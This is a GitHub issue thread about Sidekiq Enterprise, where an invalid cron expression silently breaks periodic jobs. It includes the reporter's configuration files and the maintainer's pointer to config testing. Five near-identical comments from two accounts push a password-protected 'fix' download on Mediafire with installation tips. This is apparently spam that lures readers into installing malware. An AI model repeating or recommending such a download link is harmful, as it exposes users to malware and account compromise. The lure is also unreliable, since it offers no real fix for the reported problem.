### ISSUE TITLE
Invalid crontab expression not caught on initialization and breaks Periodic Jobs

### ISSUE THREAD

**Issue by hbontempo-cw** [sidekiq/sidekiq#6415]
# Bug description

When registering a Periodic job with the cron expression `0/30 * * * *` (which is invalid) Sidekiq initializes normally, but the Periodic Jobs functionality does not work anymore (no more Jobs registered on Periodic Jobs are automatically enqueued for execution).
(ps: we have Sentry configured and we didn't receive any error) 

# Expected behavior

I expected the problem to break as soon as possible more "loudly" as possible. 
I want to know that the problem is happening without having to look into logs and through side-effects.

The best behavior would probably be: crash the process with an error during initialization. 

# Evidences observed

## Error messages are logged as WARN on `leader` process

In the `leader` process a WARN message saying `Bad Vixie-style specification 0/30 (ArgumentError)` appears.

![image](https://github.com/user-attachments/assets/4a57e309-b386-454a-a2d4-e504c3d1171d)

## PeriodicJob with wrong cron expression is not found on Web-UI or through Sidekiq API

The problematic job is not found on "Periodic" tab of the Web-UI or using SidekiqAPI (`Sidekiq::Periodic::LoopSet.new.select { |item| item.klass == 'ProblematicWorker' }`

# System

Ruby version: 3.3.4
Rails version: 7.2.1
Sidekiq / Pro / Enterprise version(s): 7.3.1 / 7.3.1 / 7.3.1

# Configuration

```ruby
# config/initializers/sidekiq.rb [redacted]

require 'sidekiq-ent'
require 'sidekiq-ent/web'
require_relative '../../app/lib/sidekiq_middlewares/rails_logger_tagger'
require_relative '../../app/lib/sidekiq_middlewares/version_tagger'

redis_url = ENV['REDIS_URL']

redis_setup = lambda do |config|
  config.redis = { url: "#{redis_url}/6", network_timeout: 5, pool_timeout: 5 } if redis_url.present?
end

# Safely migrate from Sidekiq 6 to 7
Sidekiq.strict_args!(false)

Sidekiq.configure_client do |config|
  redis_setup.call(config)

  config.client_middleware do |chain|
    chain.add SidekiqMiddlewares::VersionTagger
  end
end

Sidekiq.configure_server do |config|
  if ActiveModel::Type::Boolean.new.cast(ENV['SIDEKIQ_LIVENESS']) == true
    config.health_check(':3000')
  end

  redis_setup.call(config)

  config.periodic do |mgr|
    cron_config = Rails.application.config_for(:cron)

    mgr.tz = ActiveSupport::TimeZone.new(cron_config[:timezone])
    cron_config[:register].each do |cron|
      mgr.register(cron[:expression], cron[:worker], **{ args: cron[:args] }.compact)
    end
  end

  config.server_middleware do |chain|
    chain.add SidekiqMiddlewares::RailsLoggerTagger
  end

  config.client_middleware do |chain|
    chain.add SidekiqMiddlewares::VersionTagger
  end
end

Sidekiq::Client.reliable_push! if Rails.env.production?

# As documented on https://github.com/dannnylo/sidekiq-belt
Sidekiq::Belt.use!([:all])

Sidekiq::Belt.configure do |config|
  config.top_label = {
    production: {
      background_color: 'red',
      text: '⚠️ Production environment ⚠️',
      color: 'white'
    }
  }

  config.run_jobs = [
    { class: 'A::Worker', args: ['arg1', false], group: 'Group 1' }
  ]
end

```

```yml
# config/sidekiq.yml [redacted]

---
:concurrency: <%= ENV["SIDEKIQ_CONCURRENCY"] %>
:queues:
  - a_queue
  - b_queue
  - c_queue
 
```

```
# config/cron.yml [redacted]

---
default: &default
  timezone: Brasilia
  register: []
development:
  <<: *default
staging:
  <<: *default
  
production:
  <<: *default
  register:

    -
      expression: '0 12 * * *'
      worker: 'GoodWorkerA'
    -
      expression: '0 18 * * *'
      worker: 'GoodWorkerB'
      args:
        - 'whatever'
    -
      expression: '0/30 * * * *'
      worker: 'ProblematicWorker'

```
   

ps: Thanks @jppsantana for noticing the problem and @danilo-silva-cw for finding the warnings on the log

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by mperham** [comment]
Unfortunately that's not an error I can easily raise to the top, as it would kill all Sidekiq processes in your cluster and cause an outage. Are you using the testing support?

https://github.com/sidekiq/sidekiq/wiki/Ent-Periodic-Jobs#testing

**Comment by hbontempo-cw** [comment]
I understand your point.

I wasn't aware that there was a ConfigTester available. 
It will simplify and make our tests more relliable.
Thanks!

ps: Are there other spots where errors can happen and are ignored to make the overall process more robust? Would be great to have way to know a error happened. (so other gems like `sentry-sidekiq` can plug into the mechanism and give visibility on possible issues)
